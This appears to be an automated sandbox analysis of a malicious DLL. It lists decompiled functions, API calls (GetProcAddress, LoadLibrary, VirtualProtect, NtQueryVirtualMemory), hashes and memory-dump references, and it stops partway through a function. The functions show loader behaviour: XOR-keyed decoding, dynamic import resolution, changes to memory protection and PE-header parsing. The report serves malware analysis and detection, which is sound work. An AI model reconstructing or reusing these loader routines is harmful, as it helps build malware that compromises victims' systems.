                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d1eb4e5349fa546ca7b73c945138fb49ac9962e6a3c6df622563a118a556842
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C11DD7210420AAFDB11DBA4C888E9BBBEFFB59318F04491AF104D71D0D730E689CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SetConsoleCP.KERNELBASE(00000000,?,00000000,?,00000000), ref: 6E244399
                                                                                                                                                                                                                                                              • CreateSemaphoreA.KERNEL32(00000000,00000008,00000005,00000000), ref: 6E2443A7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleCreateSemaphore
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3129514459-0
                                                                                                                                                                                                                                                              • Opcode ID: 9695d822ad51e006857bcf544f5a7fb4047f2885ce4ea37a29d000291ab678d3
                                                                                                                                                                                                                                                              • Instruction ID: 06ff30b3cfe83f553226ff3ebab88e19ad2bb29250d55f48de1ea964b85d4586
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9695d822ad51e006857bcf544f5a7fb4047f2885ce4ea37a29d000291ab678d3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E761D072902B198BFB48CF58C858B5637A3BB47315F15023AD86997381F7B4990DDBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                                                                                                              			E6E201C12(void* __ecx) {
                                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                                                                                              				signed short _t15;
                                                                                                                                                                                                                                                              				char* _t18;
                                                                                                                                                                                                                                                              				char* _t25;
                                                                                                                                                                                                                                                              				char* _t29;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t22 = __ecx;
                                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                                              				_t25 = 0;
                                                                                                                                                                                                                                                              				if(E6E201112( &_v8,  &_v12,  *0x6e2041cc ^ 0x196db149) != 0) {
                                                                                                                                                                                                                                                              					if(_v8 == 0) {
                                                                                                                                                                                                                                                              						_t29 = 0;
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						_t29 = E6E201BCB(_t22, _v8,  *0x6e2041cc ^ 0x6e49bbff);
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					if(_t29 != 0) {
                                                                                                                                                                                                                                                              						_t15 = E6E201566(_t22); // executed
                                                                                                                                                                                                                                                              						_v12 = _t15 & 0x0000ffff;
                                                                                                                                                                                                                                                              						_t18 = StrStrIA(_t29,  &_v12); // executed
                                                                                                                                                                                                                                                              						if(_t18 != 0) {
                                                                                                                                                                                                                                                              							_t25 = 0x657;
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					HeapFree( *0x6e204190, 0, _v8);
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _t25;
                                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                                              0x6e201c12
                                                                                                                                                                                                                                                              0x6e201c15
                                                                                                                                                                                                                                                              0x6e201c16
                                                                                                                                                                                                                                                              0x6e201c2c
                                                                                                                                                                                                                                                              0x6e201c35
                                                                                                                                                                                                                                                              0x6e201c3a
                                                                                                                                                                                                                                                              0x6e201c53
                                                                                                                                                                                                                                                              0x6e201c3c
                                                                                                                                                                                                                                                              0x6e201c4f
                                                                                                                                                                                                                                                              0x6e201c4f
                                                                                                                                                                                                                                                              0x6e201c57
                                                                                                                                                                                                                                                              0x6e201c59
                                                                                                                                                                                                                                                              0x6e201c61
                                                                                                                                                                                                                                                              0x6e201c69
                                                                                                                                                                                                                                                              0x6e201c71
                                                                                                                                                                                                                                                              0x6e201c73
                                                                                                                                                                                                                                                              0x6e201c73
                                                                                                                                                                                                                                                              0x6e201c71
                                                                                                                                                                                                                                                              0x6e201c83
                                                                                                                                                                                                                                                              0x6e201c83
                                                                                                                                                                                                                                                              0x6e201c8e

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • StrStrIA.KERNELBASE(00000000,6E201810,?,6E201810,?,00000000,00000000,?,?,?,6E201810), ref: 6E201C69
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,6E201810,?,00000000,00000000,?,?,?,6E201810), ref: 6E201C83
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                                                              • Opcode ID: b226b8c636bb26d0a35badf733d1ff10c16312a1cf741b56a8267b830cd761aa
                                                                                                                                                                                                                                                              • Instruction ID: 89c79281e4191f944ccfe0ac63083fdf0f6915c376f9d948e659f685c9d46ec1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b226b8c636bb26d0a35badf733d1ff10c16312a1cf741b56a8267b830cd761aa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F018476900519ABCB408AE5CC48EDFB7BFAB85645F104165E505E3180E770DA4597B1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualProtectEx.KERNELBASE(000000FF,?,00000040,?), ref: 6E2435B3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                              • Opcode ID: 996d633ea626452ab40b7dfb5da83b087e001bb6e929cf651f99603bdff3cc6d
                                                                                                                                                                                                                                                              • Instruction ID: 9e621d7e490cae96721b55ff86c8e64f1fb65524c23add39a7f6dafa8c3cfb7f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 996d633ea626452ab40b7dfb5da83b087e001bb6e929cf651f99603bdff3cc6d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3711571902669CFEB08CF6DC498FAA7BE7BB57311F14415AE494C7381E2749A0CDBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                                              			E6E201236(void* __eax) {
                                                                                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                                              				long _t24;
                                                                                                                                                                                                                                                              				long _t26;
                                                                                                                                                                                                                                                              				long _t29;
                                                                                                                                                                                                                                                              				intOrPtr _t40;
                                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                                              				intOrPtr* _t42;
                                                                                                                                                                                                                                                              				void* _t44;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t41 = __eax;
                                                                                                                                                                                                                                                              				_t16 =  *0x6e2041cc;
                                                                                                                                                                                                                                                              				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2041cc - 0x63698bc4 &  !( *0x6e2041cc - 0x63698bc4);
                                                                                                                                                                                                                                                              				_t18 = E6E201AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2041cc - 0x63698bc4 &  !( *0x6e2041cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2041cc - 0x63698bc4 &  !( *0x6e2041cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                                                                                                                                                                                                                                              				if(_t18 != 0) {
                                                                                                                                                                                                                                                              					_t29 = 8;
                                                                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					_t40 = _v8;
                                                                                                                                                                                                                                                              					_t29 = E6E2014DE(_t33, _t40, _t41);
                                                                                                                                                                                                                                                              					if(_t29 == 0) {
                                                                                                                                                                                                                                                              						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                                                                                                                                                              						_t24 = E6E201F31(_t40, _t44); // executed
                                                                                                                                                                                                                                                              						_t29 = _t24;
                                                                                                                                                                                                                                                              						if(_t29 == 0) {
                                                                                                                                                                                                                                                              							_t26 = E6E201030(_t44, _t40); // executed
                                                                                                                                                                                                                                                              							_t29 = _t26;
                                                                                                                                                                                                                                                              							if(_t29 == 0) {
                                                                                                                                                                                                                                                              								_push(_t26);
                                                                                                                                                                                                                                                              								_push(1);
                                                                                                                                                                                                                                                              								_push(_t40);
                                                                                                                                                                                                                                                              								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                                                                                                                                                              									_t29 = GetLastError();
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					_t42 = _v12;
                                                                                                                                                                                                                                                              					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                                                                                                                                                              					E6E20136A(_t42);
                                                                                                                                                                                                                                                              					L8:
                                                                                                                                                                                                                                                              					return _t29;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              			}














                                                                                                                                                                                                                                                              0x6e20123e
                                                                                                                                                                                                                                                              0x6e201240
                                                                                                                                                                                                                                                              0x6e20125c
                                                                                                                                                                                                                                                              0x6e20126d
                                                                                                                                                                                                                                                              0x6e201274
                                                                                                                                                                                                                                                              0x6e2012d2
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201276
                                                                                                                                                                                                                                                              0x6e201276
                                                                                                                                                                                                                                                              0x6e201280
                                                                                                                                                                                                                                                              0x6e201284
                                                                                                                                                                                                                                                              0x6e201289
                                                                                                                                                                                                                                                              0x6e20128c
                                                                                                                                                                                                                                                              0x6e201291
                                                                                                                                                                                                                                                              0x6e201295
                                                                                                                                                                                                                                                              0x6e20129a
                                                                                                                                                                                                                                                              0x6e20129f
                                                                                                                                                                                                                                                              0x6e2012a3
                                                                                                                                                                                                                                                              0x6e2012a8
                                                                                                                                                                                                                                                              0x6e2012a9
                                                                                                                                                                                                                                                              0x6e2012ad
                                                                                                                                                                                                                                                              0x6e2012b2
                                                                                                                                                                                                                                                              0x6e2012ba
                                                                                                                                                                                                                                                              0x6e2012ba
                                                                                                                                                                                                                                                              0x6e2012b2
                                                                                                                                                                                                                                                              0x6e2012a3
                                                                                                                                                                                                                                                              0x6e201295
                                                                                                                                                                                                                                                              0x6e2012bc
                                                                                                                                                                                                                                                              0x6e2012c5
                                                                                                                                                                                                                                                              0x6e2012c9
                                                                                                                                                                                                                                                              0x6e2012d3
                                                                                                                                                                                                                                                              0x6e2012d9
                                                                                                                                                                                                                                                              0x6e2012d9

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E201AA5: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E201272,?,?,?,?,00000002,00000000,?,?), ref: 6E201AC9
                                                                                                                                                                                                                                                                • Part of subcall function 6E201AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E201AEB
                                                                                                                                                                                                                                                                • Part of subcall function 6E201AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E201B01
                                                                                                                                                                                                                                                                • Part of subcall function 6E201AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E201B17
                                                                                                                                                                                                                                                                • Part of subcall function 6E201AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E201B2D
                                                                                                                                                                                                                                                                • Part of subcall function 6E201AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E201B43
                                                                                                                                                                                                                                                                • Part of subcall function 6E2014DE: memcpy.NTDLL(00000000,00000002,6E201280,?,?,?,?,?,6E201280,?,?,?,?,?,?,00000002), ref: 6E20150B
                                                                                                                                                                                                                                                                • Part of subcall function 6E2014DE: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6E20153E
                                                                                                                                                                                                                                                                • Part of subcall function 6E201F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E201F69
                                                                                                                                                                                                                                                                • Part of subcall function 6E201030: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E201069
                                                                                                                                                                                                                                                                • Part of subcall function 6E201030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E2010DE
                                                                                                                                                                                                                                                                • Part of subcall function 6E201030: GetLastError.KERNEL32 ref: 6E2010E4
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 6E2012B4
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2673762927-0
                                                                                                                                                                                                                                                              • Opcode ID: 3b04fde7b42a618f3212af5f15ea72fdca2e6242b1d403c8fc3eddd4fde51e66
                                                                                                                                                                                                                                                              • Instruction ID: 3036417b45ef944b25d4e64063954664e13c4d133c00819739de3f97a94fa7ba
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b04fde7b42a618f3212af5f15ea72fdca2e6242b1d403c8fc3eddd4fde51e66
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F911267A60071A6FC7109AE9CC84DCB77BEAF4830C7040519E901D7684EBA0ED4A87A0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                                              			E6E202485(long _a4) {
                                                                                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                                                                                              				short* _v32;
                                                                                                                                                                                                                                                              				void _v36;
                                                                                                                                                                                                                                                              				void* _t57;
                                                                                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                                                                                              				signed int _t62;
                                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                                              				signed int* _t68;
                                                                                                                                                                                                                                                              				intOrPtr* _t69;
                                                                                                                                                                                                                                                              				intOrPtr* _t71;
                                                                                                                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                                                                                              				signed int _t77;
                                                                                                                                                                                                                                                              				void* _t78;
                                                                                                                                                                                                                                                              				void _t80;
                                                                                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                                                                                              				signed int _t84;
                                                                                                                                                                                                                                                              				signed int _t86;
                                                                                                                                                                                                                                                              				short* _t87;
                                                                                                                                                                                                                                                              				void* _t89;
                                                                                                                                                                                                                                                              				signed int* _t90;
                                                                                                                                                                                                                                                              				long _t91;
                                                                                                                                                                                                                                                              				signed int _t93;
                                                                                                                                                                                                                                                              				signed int _t94;
                                                                                                                                                                                                                                                              				signed int _t100;
                                                                                                                                                                                                                                                              				signed int _t102;
                                                                                                                                                                                                                                                              				void* _t104;
                                                                                                                                                                                                                                                              				long _t108;
                                                                                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t108 = _a4;
                                                                                                                                                                                                                                                              				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                                              				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                                              				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                                              				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                                              					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                                              					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                                              					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                                              						_t91 = 0;
                                                                                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                                                                                              						_a4 = 0;
                                                                                                                                                                                                                                                              						_t57 = _t76;
                                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                                              							_t80 =  *_t57;
                                                                                                                                                                                                                                                              							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                              							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                                              								goto L9;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                                              							if(_t80 >= _t91) {
                                                                                                                                                                                                                                                              								L20:
                                                                                                                                                                                                                                                              								_t63 = 0;
                                                                                                                                                                                                                                                              								L60:
                                                                                                                                                                                                                                                              								return _t63;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                                              							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                                              							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                                              								_t12 =  &_a4;
                                                                                                                                                                                                                                                              								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                                              								__eflags =  *_t12;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							_t91 = _t91 + 1;
                                                                                                                                                                                                                                                              							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                                              							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                                              						} while (_t91 <= _t102);
                                                                                                                                                                                                                                                              						__eflags = _a4;
                                                                                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                                                                                              							L15:
                                                                                                                                                                                                                                                              							_t81 =  *0x6e2041f8;
                                                                                                                                                                                                                                                              							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                                              							_t58 = 0;
                                                                                                                                                                                                                                                              							__eflags = _t81;
                                                                                                                                                                                                                                                              							if(_t81 <= 0) {
                                                                                                                                                                                                                                                              								L18:
                                                                                                                                                                                                                                                              								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                                              								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                                              								__eflags = _t61;
                                                                                                                                                                                                                                                              								if(_t61 < 0) {
                                                                                                                                                                                                                                                              									_t62 = 0;
                                                                                                                                                                                                                                                              									__eflags = 0;
                                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                                              									_t62 = _a4;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								__eflags = _t62;
                                                                                                                                                                                                                                                              								if(_t62 == 0) {
                                                                                                                                                                                                                                                              									L59:
                                                                                                                                                                                                                                                              									_t63 = _t104;
                                                                                                                                                                                                                                                              									goto L60;
                                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                                              									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                                              									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                                              									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                                              										L46:
                                                                                                                                                                                                                                                              										_t63 = 1;
                                                                                                                                                                                                                                                              										 *0x6e204240 = 1;
                                                                                                                                                                                                                                                              										__eflags =  *0x6e204240;
                                                                                                                                                                                                                                                              										if( *0x6e204240 != 0) {
                                                                                                                                                                                                                                                              											goto L60;
                                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                                              										_t84 =  *0x6e2041f8;
                                                                                                                                                                                                                                                              										__eflags = _t84;
                                                                                                                                                                                                                                                              										_t93 = _t84;
                                                                                                                                                                                                                                                              										if(_t84 <= 0) {
                                                                                                                                                                                                                                                              											L51:
                                                                                                                                                                                                                                                              											__eflags = _t93;
                                                                                                                                                                                                                                                              											if(_t93 != 0) {
                                                                                                                                                                                                                                                              												L58:
                                                                                                                                                                                                                                                              												 *0x6e204240 = 0;
                                                                                                                                                                                                                                                              												goto L5;
                                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                                              											_t77 = 0xf;
                                                                                                                                                                                                                                                              											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                                              											if(_t84 <= _t77) {
                                                                                                                                                                                                                                                              												_t77 = _t84;
                                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                                              											_t94 = 0;
                                                                                                                                                                                                                                                              											__eflags = _t77;
                                                                                                                                                                                                                                                              											if(_t77 < 0) {
                                                                                                                                                                                                                                                              												L56:
                                                                                                                                                                                                                                                              												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                                              												if(_t84 < 0x10) {
                                                                                                                                                                                                                                                              													_t86 = _t84 + 1;
                                                                                                                                                                                                                                                              													__eflags = _t86;
                                                                                                                                                                                                                                                              													 *0x6e2041f8 = _t86;
                                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                                              												do {
                                                                                                                                                                                                                                                              													_t68 = 0x6e204200 + _t94 * 4;
                                                                                                                                                                                                                                                              													_t94 = _t94 + 1;
                                                                                                                                                                                                                                                              													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                                              													 *_t68 = _t110;
                                                                                                                                                                                                                                                              													_t110 =  *_t68;
                                                                                                                                                                                                                                                              												} while (_t94 <= _t77);
                                                                                                                                                                                                                                                              												goto L56;
                                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                                              										_t69 = 0x6e2041fc + _t84 * 4;
                                                                                                                                                                                                                                                              										while(1) {
                                                                                                                                                                                                                                                              											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                                              											if( *_t69 == _t110) {
                                                                                                                                                                                                                                                              												goto L51;
                                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                                              											_t93 = _t93 - 1;
                                                                                                                                                                                                                                                              											_t69 = _t69 - 4;
                                                                                                                                                                                                                                                              											__eflags = _t93;
                                                                                                                                                                                                                                                              											if(_t93 > 0) {
                                                                                                                                                                                                                                                              												continue;
                                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                                              											goto L51;
                                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                                              										goto L51;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									_t87 = _v32;
                                                                                                                                                                                                                                                              									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                                              									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                                              									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                                              									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                                              									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                                              									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                                              									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                                              									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                                              									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                                              									if(_t78 < _t72) {
                                                                                                                                                                                                                                                              										goto L46;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                                              									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                                              										goto L46;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                                              									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                              										goto L20;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                                              								goto L16;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                                                                              								L16:
                                                                                                                                                                                                                                                              								__eflags =  *((intOrPtr*)(0x6e204200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                              								if( *((intOrPtr*)(0x6e204200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                              									break;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								_t58 = _t58 + 1;
                                                                                                                                                                                                                                                              								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                                              								if(_t58 < _t81) {
                                                                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								goto L18;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                                                                                              							if(_t58 <= 0) {
                                                                                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							 *0x6e204240 = 1;
                                                                                                                                                                                                                                                              							__eflags =  *0x6e204240;
                                                                                                                                                                                                                                                              							if( *0x6e204240 != 0) {
                                                                                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							__eflags =  *((intOrPtr*)(0x6e204200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                              							if( *((intOrPtr*)(0x6e204200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                                              								_t100 = 0;
                                                                                                                                                                                                                                                              								__eflags = _t58;
                                                                                                                                                                                                                                                              								if(_t58 < 0) {
                                                                                                                                                                                                                                                              									L34:
                                                                                                                                                                                                                                                              									 *0x6e204240 = 0;
                                                                                                                                                                                                                                                              									goto L5;
                                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                                              									L33:
                                                                                                                                                                                                                                                              									_t90 = 0x6e204200 + _t100 * 4;
                                                                                                                                                                                                                                                              									_t100 = _t100 + 1;
                                                                                                                                                                                                                                                              									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                                              									 *_t90 = _t110;
                                                                                                                                                                                                                                                              									_t110 =  *_t90;
                                                                                                                                                                                                                                                              								} while (_t100 <= _t58);
                                                                                                                                                                                                                                                              								goto L34;
                                                                                                                                                                                                                                                              							}
